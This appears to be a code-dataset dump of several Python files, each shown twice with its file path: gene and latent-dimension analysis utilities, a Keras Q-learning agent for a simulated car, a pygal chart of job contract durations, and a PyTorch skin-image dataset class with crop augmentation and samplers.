raise NotImplementedError("probabilities has not been implemented.") | 0.974288 | 0.835886 |
import torch
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from collections import defaultdict
def mean_of_attention_heads(matrix, out_dim):
chunks = torch.split(matrix, out_dim, dim=1)
return torch.mean(torch.stack(chunks), dim=0)
def latent_dim_participation_in_clusters(latent_data, labels):
latent_diff = np.zeros(shape=(latent_data.shape[1], len(set(labels)) + 1))
for l_dim in range(latent_data.shape[1]):
cells_in_dim = latent_data[:, l_dim]
l_dim_mean = np.mean(cells_in_dim)
l_dim_std = np.std(cells_in_dim)
variable_cells_larger = np.where(cells_in_dim > l_dim_mean + l_dim_std)
variable_cells_smaller = np.where(cells_in_dim < l_dim_mean - l_dim_std)
labels_larger = labels[variable_cells_larger]
labels_smaller = labels[variable_cells_smaller]
variable_labels = np.concatenate((labels_larger, labels_smaller), axis=None)
cluster_count = {x: list(variable_labels).count(x) for x in labels}
counter_per_cluster = np.array(list(cluster_count.values())) / len(variable_labels)
counter_per_cluster = np.around(counter_per_cluster * 100.0, decimals=2)
latent_diff[l_dim][1:] = counter_per_cluster
latent_diff[l_dim][0] = int(l_dim)
cluster_label = [str(i) for i in np.unique(labels)]
latent_diff = pd.DataFrame(latent_diff, columns=['Latent dimension'] + cluster_label)
latent_diff['Latent dimension'] = latent_diff['Latent dimension'].astype(int)
latent_diff = latent_diff.melt(id_vars=['Latent dimension'], value_vars=cluster_label, var_name='Cluster',
value_name='Percentage')
sns.set(font_scale=2.5)
sns.set_style("whitegrid")
g = sns.catplot(x='Cluster', y='Percentage', col='Latent dimension', data=latent_diff, palette=sns.color_palette("hls", len(set(labels))), col_wrap=5,
kind="bar", ci=None, aspect=1.3, legend_out=True)
for ax in g.axes:
ax.set_xticklabels(sorted(set(labels)))
plt.setp(ax.get_xticklabels(), visible=True)
for ax in g.axes.flatten():
ax.tick_params(labelbottom=True)
return latent_diff
def _indices_of_top_k(arr, k):
return np.argpartition(arr, -k)[-k:]
def select_genes_by_latent_dim(matrix, latent_dim, top_k):
corresponding_to_latent_dim = matrix[:, latent_dim]
return _indices_of_top_k(corresponding_to_latent_dim.detach().numpy(), top_k)
def merged_count(list_of_tuples):
counter = defaultdict(int)
for lst in list_of_tuples:
for tup in lst:
counter[tup[0]] += tup[1]
return counter | cellvgae/utils/top_genes.py | import torch
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from collections import defaultdict
def mean_of_attention_heads(matrix, out_dim):
chunks = torch.split(matrix, out_dim, dim=1)
return torch.mean(torch.stack(chunks), dim=0)
def latent_dim_participation_in_clusters(latent_data, labels):
latent_diff = np.zeros(shape=(latent_data.shape[1], len(set(labels)) + 1))
for l_dim in range(latent_data.shape[1]):
cells_in_dim = latent_data[:, l_dim]
l_dim_mean = np.mean(cells_in_dim)
l_dim_std = np.std(cells_in_dim)
variable_cells_larger = np.where(cells_in_dim > l_dim_mean + l_dim_std)
variable_cells_smaller = np.where(cells_in_dim < l_dim_mean - l_dim_std)
labels_larger = labels[variable_cells_larger]
labels_smaller = labels[variable_cells_smaller]
variable_labels = np.concatenate((labels_larger, labels_smaller), axis=None)
cluster_count = {x: list(variable_labels).count(x) for x in labels}
counter_per_cluster = np.array(list(cluster_count.values())) / len(variable_labels)
counter_per_cluster = np.around(counter_per_cluster * 100.0, decimals=2)
latent_diff[l_dim][1:] = counter_per_cluster
latent_diff[l_dim][0] = int(l_dim)
cluster_label = [str(i) for i in np.unique(labels)]
latent_diff = pd.DataFrame(latent_diff, columns=['Latent dimension'] + cluster_label)
latent_diff['Latent dimension'] = latent_diff['Latent dimension'].astype(int)
latent_diff = latent_diff.melt(id_vars=['Latent dimension'], value_vars=cluster_label, var_name='Cluster',
value_name='Percentage')
sns.set(font_scale=2.5)
sns.set_style("whitegrid")
g = sns.catplot(x='Cluster', y='Percentage', col='Latent dimension', data=latent_diff, palette=sns.color_palette("hls", len(set(labels))), col_wrap=5,
kind="bar", ci=None, aspect=1.3, legend_out=True)
for ax in g.axes:
ax.set_xticklabels(sorted(set(labels)))
plt.setp(ax.get_xticklabels(), visible=True)
for ax in g.axes.flatten():
ax.tick_params(labelbottom=True)
return latent_diff
def _indices_of_top_k(arr, k):
return np.argpartition(arr, -k)[-k:]
def select_genes_by_latent_dim(matrix, latent_dim, top_k):
corresponding_to_latent_dim = matrix[:, latent_dim]
return _indices_of_top_k(corresponding_to_latent_dim.detach().numpy(), top_k)
def merged_count(list_of_tuples):
counter = defaultdict(int)
for lst in list_of_tuples:
for tup in lst:
counter[tup[0]] += tup[1]
return counter | 0.742422 | 0.574723 |
import numpy as np
import random
import keras
class QLearning_NN():
def __init__(self,rl_params,weights_save_dir):
self.parameters = dict(rl_params)
self.weights_save_dir = weights_save_dir
self.parameters['output_length'] = len(self.parameters['actions'])
self.epoch = 0
self.replay,self.replay_index = [],0
self.itr,self.avg_loss,self.avg_score = 0,0,0
self.train_hist = None
self.log = {'avg_loss':[],'final_score':[],'state':[],'cross_score':[],'epoch':[]}
def random_seed(self,seed):
random.seed(seed)
def generate_nn(self):
self.model = keras.models.Sequential()
weights_init = keras.initializers.Constant(value=0.1) #'lecun_uniform'
activation = None
self.model.add(keras.layers.Dense(20, kernel_initializer=weights_init, input_shape=(self.parameters['state_dimension'],), activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
self.model.add(keras.layers.Dense(self.parameters['output_length'], kernel_initializer=weights_init, activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
# I found Adam is more stable(than SGD/RMSprop) in handling new samples of (X,y) and overfitting, it does still oscillate but in a more subtle manner
optim = keras.optimizers.Adam(lr=self.parameters['lr_alpha'], beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) #lr_alpha=0.001
self.model.compile(optimizer=optim, loss='mse')
def load_weights(self,weights):
self.model.load_weights(weights)
def take_action(self,agent,dt,epsilon_override=None):
sensor_readings = np.array(agent.get_sensor_reading())
q_vals = self.model.predict(sensor_readings.reshape(1,self.parameters['state_dimension']),batch_size=1,verbose=0)
if epsilon_override is not None:
epsilon = epsilon_override
else:
epsilon = self.parameters['epsilon']
if (random.random() > epsilon):
action = random.randint(0,self.parameters['output_length']-1)
else:
action = (np.argmax(q_vals))
v,s = self.parameters['actions'][action]
agent.set_velocity(v)
agent.set_steering(s)
agent.update(dt)
return sensor_readings,action
def reward_function(self,agent):
if agent.state == 'timeup':
reward = self.parameters['timeup_reward']
elif agent.state == 'collided':
reward = self.parameters['collision_reward']
elif agent.state == 'destination':
reward = self.parameters['destination_reward']
else:
#reward = 0
#reward = agent.score # Encourages the car to MOVE, not necessarily forward, infact moving in circles is encouraged
#reward = -30+agent.score # Encourages the car to crash and end its misery
#reward = -1 # To factor in time but encourages the car to crash and end its misery. Useful if destination reward is high
reward = 1 if agent.score-agent.prev_score>0 else -1
return reward
def train_nn(self,sensor_readings,action,reward,new_sensor_readings,agent_state):
if (len(self.replay)<self.parameters['buffer_length']):
self.replay.append((sensor_readings,action,reward,new_sensor_readings,agent_state))
else:
self.replay_index += 1
if self.replay_index>=self.parameters['buffer_length']: self.replay_index=0
self.replay[self.replay_index] = ((sensor_readings,action,reward,new_sensor_readings,agent_state))
if (len(self.replay)>self.parameters['replay_start_at']):
minibatch = random.sample(self.replay, self.parameters['minibatchsize'])
mb_len = len(minibatch)
old_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
old_actions = np.zeros(shape=(mb_len,))
rewards = np.zeros(shape=(mb_len,))
new_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
car_state = []
for i, m in enumerate(minibatch):
old_state_m, action_m, reward_m, new_state_m, car_state_m = m
old_states[i, :] = old_state_m[...]
old_actions[i] = action_m
rewards[i] = reward_m
new_states[i, :] = new_state_m[...]
car_state.append(car_state_m)
car_state = np.array(car_state)
old_qvals = self.model.predict(old_states, batch_size=mb_len)
new_qvals = self.model.predict(new_states, batch_size=mb_len)
maxQs = np.max(new_qvals, axis=1)
y = old_qvals
non_term_inds = np.where(car_state == 'running')[0]
#non_term_inds = np.concatenate((non_term_inds,np.where(car_state == 'destination')[0]))
term_inds = np.where(car_state == 'timeup')[0]
term_inds = np.concatenate((term_inds,np.where(car_state == 'collided')[0]))
term_inds = np.concatenate((term_inds,np.where(car_state == 'destination')[0]))
y[non_term_inds, old_actions[non_term_inds].astype(int)] = rewards[non_term_inds] + (self.parameters['gamma'] * maxQs[non_term_inds])
y[term_inds, old_actions[term_inds].astype(int)] = rewards[term_inds]
X_train = old_states
y_train = y
self.train_hist = self.model.fit(X_train, y_train, batch_size=self.parameters['batchsize'], epochs=1, verbose=0)
def check_terminal_state_and_log(self,agent,env):
self.itr += 1
self.avg_loss = 0 if self.train_hist is None else (self.avg_loss+self.train_hist.history['loss'][0])
terminal_state,debug_data = None,None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
self.epoch += 1
if (len(self.replay)>=self.parameters['replay_start_at']) and self.parameters['epsilon']<self.parameters['max_epsilon']:
self.parameters['epsilon'] += self.parameters['epsilon_step']
self.avg_loss /= self.itr
self.log['avg_loss'].append(self.avg_loss)
self.log['final_score'].append(agent.score)
self.log['state'].append(agent.state)
if self.avg_loss==0:
self.log['cross_score'].append(0)
else:
self.log['cross_score'].append(agent.score*(1/self.avg_loss))
self.log['epoch'].append(self.epoch)
if self.epoch%5==0:
self.avg_score = sum(self.log['final_score'][self.epoch-5:self.epoch])/5
np.save('./log',self.log)
self.model.save_weights(self.weights_save_dir+'rlcar_epoch_'+str(self.epoch).zfill(5))
print 'Epoch ',self.epoch,'Epsilon=',self.parameters['epsilon'],'Run=',agent.state,'Avg score=',self.avg_score,'Avg loss=',self.avg_loss
debug_data = '[Training]\n'+'Epoch '+str(self.epoch)+'\nEpsilon='+str(self.parameters['epsilon'])+'\nRun='+str(agent.state)+'\nAvg score='+'{:.2f}'.format(self.avg_score)+'\nAvg loss='+str(self.avg_loss)
self.avg_loss,self.itr = 0,0
terminal_state = agent.get_state()
agent.reset()
if self.parameters['random_car_position']==True:
agent.set_state([1+env.route[0].x+(env.track_width*1.2*(random.random()-0.5)),env.route[0].y+(env.track_width*1.2*(random.random()-0.5)),env.start_angle+(random.random()-0.5)])
return terminal_state,debug_data,self.log['epoch'],self.log['avg_loss'],self.log['final_score'],self.log['cross_score']
def check_terminal_state(self,agent):
terminal_state = None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
terminal_state = agent.state
agent.reset()
return terminal_state
def learn_step(self,agent,env,dt):
sensor_values,action_taken = self.take_action(agent,dt)
env.compute_interaction([agent])
new_sensor_values = np.array(agent.get_sensor_reading())
reward = self.reward_function(agent)
self.train_nn(sensor_values,action_taken,reward,new_sensor_values,agent.state)
return self.check_terminal_state_and_log(agent,env)
def run_step(self,agent,env,dt):
self.take_action(agent,dt,epsilon_override=1.0)
return self.check_terminal_state(agent) | RL.py | import numpy as np
import random
import keras
class QLearning_NN():
def __init__(self,rl_params,weights_save_dir):
self.parameters = dict(rl_params)
self.weights_save_dir = weights_save_dir
self.parameters['output_length'] = len(self.parameters['actions'])
self.epoch = 0
self.replay,self.replay_index = [],0
self.itr,self.avg_loss,self.avg_score = 0,0,0
self.train_hist = None
self.log = {'avg_loss':[],'final_score':[],'state':[],'cross_score':[],'epoch':[]}
def random_seed(self,seed):
random.seed(seed)
def generate_nn(self):
self.model = keras.models.Sequential()
weights_init = keras.initializers.Constant(value=0.1) #'lecun_uniform'
activation = None
self.model.add(keras.layers.Dense(20, kernel_initializer=weights_init, input_shape=(self.parameters['state_dimension'],), activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
self.model.add(keras.layers.Dense(self.parameters['output_length'], kernel_initializer=weights_init, activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
# I found Adam is more stable(than SGD/RMSprop) in handling new samples of (X,y) and overfitting, it does still oscillate but in a more subtle manner
optim = keras.optimizers.Adam(lr=self.parameters['lr_alpha'], beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) #lr_alpha=0.001
self.model.compile(optimizer=optim, loss='mse')
def load_weights(self,weights):
self.model.load_weights(weights)
def take_action(self,agent,dt,epsilon_override=None):
sensor_readings = np.array(agent.get_sensor_reading())
q_vals = self.model.predict(sensor_readings.reshape(1,self.parameters['state_dimension']),batch_size=1,verbose=0)
if epsilon_override is not None:
epsilon = epsilon_override
else:
epsilon = self.parameters['epsilon']
if (random.random() > epsilon):
action = random.randint(0,self.parameters['output_length']-1)
else:
action = (np.argmax(q_vals))
v,s = self.parameters['actions'][action]
agent.set_velocity(v)
agent.set_steering(s)
agent.update(dt)
return sensor_readings,action
def reward_function(self,agent):
if agent.state == 'timeup':
reward = self.parameters['timeup_reward']
elif agent.state == 'collided':
reward = self.parameters['collision_reward']
elif agent.state == 'destination':
reward = self.parameters['destination_reward']
else:
#reward = 0
#reward = agent.score # Encourages the car to MOVE, not necessarily forward, infact moving in circles is encouraged
#reward = -30+agent.score # Encourages the car to crash and end its misery
#reward = -1 # To factor in time but encourages the car to crash and end its misery. Useful if destination reward is high
reward = 1 if agent.score-agent.prev_score>0 else -1
return reward
def train_nn(self,sensor_readings,action,reward,new_sensor_readings,agent_state):
if (len(self.replay)<self.parameters['buffer_length']):
self.replay.append((sensor_readings,action,reward,new_sensor_readings,agent_state))
else:
self.replay_index += 1
if self.replay_index>=self.parameters['buffer_length']: self.replay_index=0
self.replay[self.replay_index] = ((sensor_readings,action,reward,new_sensor_readings,agent_state))
if (len(self.replay)>self.parameters['replay_start_at']):
minibatch = random.sample(self.replay, self.parameters['minibatchsize'])
mb_len = len(minibatch)
old_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
old_actions = np.zeros(shape=(mb_len,))
rewards = np.zeros(shape=(mb_len,))
new_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
car_state = []
for i, m in enumerate(minibatch):
old_state_m, action_m, reward_m, new_state_m, car_state_m = m
old_states[i, :] = old_state_m[...]
old_actions[i] = action_m
rewards[i] = reward_m
new_states[i, :] = new_state_m[...]
car_state.append(car_state_m)
car_state = np.array(car_state)
old_qvals = self.model.predict(old_states, batch_size=mb_len)
new_qvals = self.model.predict(new_states, batch_size=mb_len)
maxQs = np.max(new_qvals, axis=1)
y = old_qvals
non_term_inds = np.where(car_state == 'running')[0]
#non_term_inds = np.concatenate((non_term_inds,np.where(car_state == 'destination')[0]))
term_inds = np.where(car_state == 'timeup')[0]
term_inds = np.concatenate((term_inds,np.where(car_state == 'collided')[0]))
term_inds = np.concatenate((term_inds,np.where(car_state == 'destination')[0]))
y[non_term_inds, old_actions[non_term_inds].astype(int)] = rewards[non_term_inds] + (self.parameters['gamma'] * maxQs[non_term_inds])
y[term_inds, old_actions[term_inds].astype(int)] = rewards[term_inds]
X_train = old_states
y_train = y
self.train_hist = self.model.fit(X_train, y_train, batch_size=self.parameters['batchsize'], epochs=1, verbose=0)
def check_terminal_state_and_log(self,agent,env):
self.itr += 1
self.avg_loss = 0 if self.train_hist is None else (self.avg_loss+self.train_hist.history['loss'][0])
terminal_state,debug_data = None,None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
self.epoch += 1
if (len(self.replay)>=self.parameters['replay_start_at']) and self.parameters['epsilon']<self.parameters['max_epsilon']:
self.parameters['epsilon'] += self.parameters['epsilon_step']
self.avg_loss /= self.itr
self.log['avg_loss'].append(self.avg_loss)
self.log['final_score'].append(agent.score)
self.log['state'].append(agent.state)
if self.avg_loss==0:
self.log['cross_score'].append(0)
else:
self.log['cross_score'].append(agent.score*(1/self.avg_loss))
self.log['epoch'].append(self.epoch)
if self.epoch%5==0:
self.avg_score = sum(self.log['final_score'][self.epoch-5:self.epoch])/5
np.save('./log',self.log)
self.model.save_weights(self.weights_save_dir+'rlcar_epoch_'+str(self.epoch).zfill(5))
print 'Epoch ',self.epoch,'Epsilon=',self.parameters['epsilon'],'Run=',agent.state,'Avg score=',self.avg_score,'Avg loss=',self.avg_loss
debug_data = '[Training]\n'+'Epoch '+str(self.epoch)+'\nEpsilon='+str(self.parameters['epsilon'])+'\nRun='+str(agent.state)+'\nAvg score='+'{:.2f}'.format(self.avg_score)+'\nAvg loss='+str(self.avg_loss)
self.avg_loss,self.itr = 0,0
terminal_state = agent.get_state()
agent.reset()
if self.parameters['random_car_position']==True:
agent.set_state([1+env.route[0].x+(env.track_width*1.2*(random.random()-0.5)),env.route[0].y+(env.track_width*1.2*(random.random()-0.5)),env.start_angle+(random.random()-0.5)])
return terminal_state,debug_data,self.log['epoch'],self.log['avg_loss'],self.log['final_score'],self.log['cross_score']
def check_terminal_state(self,agent):
terminal_state = None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
terminal_state = agent.state
agent.reset()
return terminal_state
def learn_step(self,agent,env,dt):
sensor_values,action_taken = self.take_action(agent,dt)
env.compute_interaction([agent])
new_sensor_values = np.array(agent.get_sensor_reading())
reward = self.reward_function(agent)
self.train_nn(sensor_values,action_taken,reward,new_sensor_values,agent.state)
return self.check_terminal_state_and_log(agent,env)
def run_step(self,agent,env,dt):
self.take_action(agent,dt,epsilon_override=1.0)
return self.check_terminal_state(agent) | 0.562898 | 0.232997 |
import re
from os.path import join
import glob
import os
import pandas as pd
from datetime import date
import pygal
from pygal.style import BlueStyle
from pygal.style import DarkGreenBlueStyle
from pygal.style import TurquoiseStyle
from pygal.style import CleanStyle
from collections import Counter
from pygal.style import LightenStyle
def get_data():
with open("../data/romanistik-stellen_datensatz_2014-2021.csv", "r", encoding="utf8") as infile:
data = pd.read_csv(infile, sep="\t")
print(data.head())
return data
def prepare_data(data):
# Filter down to useable data
data = data.fillna(0)
data = data.loc[:,["include", "dauer_cat", "domain_ling"]]
data = data[data["include"] == 1]
data = data[data["domain_ling"] == 1]
print(data.head())
n = data.shape[0]
print("Anzahl der Datenpunkte", n)
from collections import Counter
data = dict(Counter(list(data.loc[:,"dauer_cat"])))
print(data)
return data,n
def viz(data,n):
dark_lighten_style = LightenStyle('#700925',
step=10,
font_family="FreeSans",
label_font_size = 12,
major_label_font_size = 12,
value_label_font_size = 12,
value_font_size = 12,
title_font_size = 16)
chart = pygal.HorizontalBar(
style=dark_lighten_style,
print_values = True,
show_legend = False,
legend_at_bottom = True,
legend_at_bottom_columns = 9,
legend_box_size=24,
range = (0,50))
chart.title = "Vertragslaufzeiten (nur Linguistik)"
chart.x_title = "Anteile der Vertragslaufzeiten in Prozent (n="+str(n)+")"
chart.y_title = "Monate"
chart.x_labels = ["unb.", "66+", "~60", "~48", "~36", "~24", "~12", "1-6"]
chart.add("Laufzeiten", [data["unb."]/n*100,
data["66+"]/n*100,
data["~60"]/n*100,
data["~48"]/n*100,
data["~36"]/n*100,
data["~24"]/n*100,
data["~12"]/n*100,
data["1-6"]/n*100,], formatter=lambda x: '{:.1f}%'.format(x))
chart.render_to_file("../img/romanistik_laufzeit-fachgebiet-ling.svg")
def main():
data = get_data()
data,n = prepare_data(data)
viz(data,n)
main() | code/viz_laufzeit_fachgebiet_ling.py | import re
from os.path import join
import glob
import os
import pandas as pd
from datetime import date
import pygal
from pygal.style import BlueStyle
from pygal.style import DarkGreenBlueStyle
from pygal.style import TurquoiseStyle
from pygal.style import CleanStyle
from collections import Counter
from pygal.style import LightenStyle
def get_data():
with open("../data/romanistik-stellen_datensatz_2014-2021.csv", "r", encoding="utf8") as infile:
data = pd.read_csv(infile, sep="\t")
print(data.head())
return data
def prepare_data(data):
# Filter down to useable data
data = data.fillna(0)
data = data.loc[:,["include", "dauer_cat", "domain_ling"]]
data = data[data["include"] == 1]
data = data[data["domain_ling"] == 1]
print(data.head())
n = data.shape[0]
print("Anzahl der Datenpunkte", n)
from collections import Counter
data = dict(Counter(list(data.loc[:,"dauer_cat"])))
print(data)
return data,n
def viz(data,n):
dark_lighten_style = LightenStyle('#700925',
step=10,
font_family="FreeSans",
label_font_size = 12,
major_label_font_size = 12,
value_label_font_size = 12,
value_font_size = 12,
title_font_size = 16)
chart = pygal.HorizontalBar(
style=dark_lighten_style,
print_values = True,
show_legend = False,
legend_at_bottom = True,
legend_at_bottom_columns = 9,
legend_box_size=24,
range = (0,50))
chart.title = "Vertragslaufzeiten (nur Linguistik)"
chart.x_title = "Anteile der Vertragslaufzeiten in Prozent (n="+str(n)+")"
chart.y_title = "Monate"
chart.x_labels = ["unb.", "66+", "~60", "~48", "~36", "~24", "~12", "1-6"]
chart.add("Laufzeiten", [data["unb."]/n*100,
data["66+"]/n*100,
data["~60"]/n*100,
data["~48"]/n*100,
data["~36"]/n*100,
data["~24"]/n*100,
data["~12"]/n*100,
data["1-6"]/n*100,], formatter=lambda x: '{:.1f}%'.format(x))
chart.render_to_file("../img/romanistik_laufzeit-fachgebiet-ling.svg")
def main():
data = get_data()
data,n = prepare_data(data)
viz(data,n)
main() | 0.144239 | 0.1811 |
import torch
import torch.nn as nn
import torch.nn.functional as F
import pydicom
import numpy as np
import cv2
import re
import glob
import os, os.path as osp
from PIL import Image
from torch.utils.data import Dataset, Sampler
from .utils import _isnone
from .crop_tta import crop_tta, resize_for_crop
import numpy as np
def square_crop(img, random=True):
h, w = img.shape[:2]
if h == w: return img
s = min(h, w)
short_side = 0 if h<w else 1
xc, yc = h//2, w//2
if random:
offset = np.abs(h-w)
offset = np.random.randint(-offset, offset)
if short_side:
xc += offset//2
else:
yc += offset//2
x1, y1 = xc-s//2, yc-s//2
x1, y1 = max(0,x1), max(0,y1)
img_crop = img[x1:x1+s, y1:y1+s]
if img_crop.shape[0] != img_crop.shape[1]:
print(f'Shape is {img_crop.shape}')
return img
return img_crop
def generate_crops(img, num_crops=10):
h, w = img.shape[:2]
if h == w: return [img]
s = min(h, w)
short_side = 0 if h<w else 1
xc, yc = h//2, w//2
offset = np.abs(h-w)
offsets = np.unique(np.linspace(-offset+1, offset-1, num_crops).astype('int'))
crops = []
for off in offsets:
if short_side:
new_xc = xc-off//2
x1, y1 = new_xc-s//2, yc-s//2
else:
new_yc = yc-off//2
x1, y1 = xc-s//2, new_yc-s//2
x1, y1 = max(0,x1), max(0,y1)
crops += [img[x1:x1+s, y1:y1+s]]
if crops[-1].shape[0] != crops[-1].shape[1]:
print(f'Shape is {crops[-1].shape}')
print(img.shape)
print(x1, y1, s)
crops[-1] = img
return crops
class SkinDataset(Dataset):
def __init__(self,
imgfiles,
labels,
meta=None,
square=False,
square_tta=None,
crop_tta=None,
pad=None,
resize=None,
transform=None,
crop=None,
preprocessor=None,
flip=False,
verbose=True,
test_mode=False,
jsd=False,
onehot=False):
self.imgfiles = imgfiles
self.labels = labels
self.meta = meta
self.square = square
self.square_tta = square_tta
self.crop_tta = crop_tta
self.pad = pad
self.resize = resize
self.transform = transform
self.crop = crop
if self.crop:
self.crop_size = (self.crop.transforms[0].height, self.crop.transforms[0].width)
self.preprocessor = preprocessor
self.flip = flip
self.verbose = verbose
self.test_mode = test_mode
self.jsd = jsd
self.onehot = onehot
def process_image(self, X, jsd=False):
if self.pad: X = self.pad(X)
if self.resize: X = self.resize(image=X)['image']
if self.transform and not jsd: X = self.transform(image=X)['image']
if self.crop and not self.test_mode:
X = resize_for_crop(X, crop_size=self.crop_size)
X = self.crop(image=X)['image']
if self.preprocessor: X = self.preprocessor.preprocess(X)
return X.transpose(2, 0, 1)
def get(self, i):
try:
X = cv2.imread(self.imgfiles[i])
if _isnone(X):
X = cv2.imread(self.imgfiles[i].replace('jpg','png'))
if _isnone(X):
return None
if not _isnone(self.meta):
X = {'img': X}
X.update(self.meta[i])
return X
except Exception as e:
if self.verbose: print(e)
return None
@staticmethod
def flip_array(X, mode):
if mode == 0:
X = X[:,::-1]
elif mode == 1:
X = X[:,:,::-1]
elif mode == 2:
X = X[:,::-1,::-1]
elif mode == 3 and X.shape[-1] == X.shape[-2]:
X = X.transpose(0,2,1)
X = np.ascontiguousarray(X)
return X
def __len__(self):
return len(self.imgfiles)
def __getitem__(self, i):
X = self.get(i)
while _isnone(X):
if self.verbose: print('Failed to read {} !'.format(self.imgfiles[i]))
i = np.random.randint(len(self))
X = self.get(i)
if self.test_mode and self.square_tta:
if isinstance(X, dict):
X['img'] = generate_crops(X['img'], num_crops=self.square_tta)
X['img'] = np.asarray([self.process_image(_) for _ in X['img']])
for k,v in X.items():
if k == 'img': continue
X[k] = np.repeat(np.expand_dims(v, axis=0), X['img'].shape[0], axis=0)
else:
X = generate_crops(X, num_crops=self.square_tta)
X = np.asarray([self.process_image(_) for _ in X])
elif self.test_mode and self.crop_tta:
if isinstance(X, dict):
X['img'] = crop_tta(X['img'], crop_size=self.crop_size, num_crops=self.crop_tta)
X['img'] = np.asarray([self.process_image(_) for _ in X['img']])
for k,v in X.items():
if k == 'img': continue
X[k] = np.repeat(np.expand_dims(v, axis=0), X['img'].shape[0], axis=0)
else:
X = crop_tta(X, crop_size=self.crop_size, num_crops=self.crop_tta)
X = np.asarray([self.process_image(_) for _ in X])
else:
if isinstance(X, dict):
if self.square: X['img'] = square_crop(X['img'], random=not self.test_mode)
if self.jsd: raise Exception('JSD not supported when using metadata')
X['img'] = self.process_image(X['img'])
else:
if self.square: X = square_crop(X, random=not self.test_mode)
if self.jsd and not self.test_mode: X_orig = X.copy()
X = self.process_image(X)
if self.jsd and not self.test_mode:
# Additional aug
X_aug = self.process_image(X_orig)
X_orig = self.process_image(X_orig, jsd=True)
if self.onehot and not self.test_mode:
onehot_y = {
0: [1.,0.,0.],
1: [0.,1.,0.],
2: [0.,0.,1.]
}
y = self.labels[i]
if isinstance(y, str):
y = y.split(',')
y = [float(_) for _ in y]
else:
y = onehot_y[int(y)]
if len(y) == 1:
y = onehot_y[int(y[0])]
else:
y = self.labels[i]
if isinstance(y, str):
y = float(y)
if self.flip and not self.test_mode:
# X.shape = (C, H, W)
mode = np.random.randint(5)
if isinstance(X, dict):
X['img'] = self.flip_array(X['img'], mode)
else:
X = self.flip_array(X, mode)
if self.jsd and not self.test_mode:
X_aug = self.flip_array(X_aug, mode)
X_orig = self.flip_array(X_orig, mode)
if isinstance(X, dict):
X = {k: torch.tensor(v) for k,v in X.items()}
else:
X = torch.tensor(X)
if self.jsd and not self.test_mode:
X = (torch.tensor(X_orig), torch.tensor(X), torch.tensor(X_aug))
y = torch.tensor(y)
return X, y
class SiameseDataset(Dataset):
def __init__(self,
imgfiles,
labels,
pad=None,
resize=None,
transform=None,
crop=None,
preprocessor=None,
flip=False,
verbose=True,
test_mode=False):
self.imgfiles = imgfiles
self.labels = labels
self.pad = pad
self.resize = resize
self.transform = transform
self.crop = crop
self.preprocessor = preprocessor
self.flip = flip
self.verbose = verbose
self.test_mode = test_mode
self.posfiles = [self.imgfiles[i] for i in range(len(self.imgfiles)) if self.labels[i] == 1]
self.negfiles = [self.imgfiles[i] for i in range(len(self.imgfiles)) if self.labels[i] == 0]
self.get = self.get_test if self.test_mode else self.get_train
def process_image(self, X):
if self.pad: X = self.pad(X)
if self.resize: X = self.resize(image=X)['image']
if self.transform: X = self.transform(image=X)['image']
if self.crop: X = self.crop(image=X)['image']
if self.preprocessor: X = self.preprocessor.preprocess(X)
return X.transpose(2, 0, 1)
def _read_image(self, fp):
X = cv2.imread(fp)
if _isnone(X):
X = cv2.imread(fp.replace('jpg','png'))
return X
def get_test(self, i):
try:
return self._read_image(self.imgfiles[i])
except Exception as e:
if self.verbose: print(e)
return None
def get_train(self, i):
try:
pair_type = np.random.randint(4)
if pair_type <= 1:
X1 = self._read_image(np.random.choice(self.posfiles))
X2 = self._read_image(np.random.choice(self.negfiles))
elif pair_type == 2:
X1 = self._read_image(np.random.choice(self.posfiles))
X2 = self._read_image(np.random.choice(self.posfiles))
elif pair_type == 3:
X1 = self._read_image(np.random.choice(self.negfiles))
X2 = self._read_image(np.random.choice(self.negfiles))
return [X1, X2], pair_type
except Exception as e:
if self.verbose: print(e)
return None
def __len__(self):
return len(self.imgfiles)
def __getitem__(self, i):
X = self.get(i)
while _isnone(X):
if self.verbose: print('Failed to read {} !'.format(self.imgfiles[i]))
i = np.random.randint(len(self))
X = self.get(i)
if self.test_mode:
X = self.process_image(X)
y = self.labels[i]
else:
X, pair_type = X
X = np.asarray([self.process_image(_) for _ in X])
if pair_type <= 1:
y = 0 # different
else:
y = 1 # same
if self.flip and not self.test_mode:
# X.shape = (2, C, H, W)
mode = np.random.randint(5)
if mode == 0:
X = X[...,::-1]
elif mode == 1:
X = X[...,::-1,:]
elif mode == 2:
X = X[...,::-1,::-1]
elif mode == 3 and X.shape[-1] == X.shape[-2]:
X = X.swapaxes(-1, -2)
X = np.ascontiguousarray(X)
X = torch.tensor(X)
y = torch.tensor(y)
return X, y
class Upsampler(Sampler):
def __init__(self, dataset, upsample_factor=25):
super().__init__(data_source=dataset)
self.labels = np.asarray(dataset.labels)
self.num_pos = np.sum(self.labels >= 0.5)
self.num_neg = np.sum(self.labels < 0.5)
self.upsample_factor = upsample_factor
self.length = self.num_neg + upsample_factor * self.num_pos
def __len__(self):
return self.length
def __iter__(self):
indices = []
indices += list(np.where(self.labels < 0.5)[0])
indices += list(np.random.choice(np.where(self.labels >= 0.5)[0], self.upsample_factor * self.num_pos, replace=True))
indices = np.random.permutation(indices)
return iter(indices.tolist())
class BalancedSampler(Sampler):
def __init__(self, dataset, weights=[2,1], pos_label=1):
super().__init__(data_source=dataset)
self.labels = np.asarray(dataset.labels)
self.pos_label = pos_label
self.num_pos = np.sum(self.labels == pos_label)
self.num_neg = np.sum(self.labels != pos_label)
# weights ordered as [neg, pos]
self.weights = np.asarray(weights)
self.weights = self.weights / np.sum(self.weights)
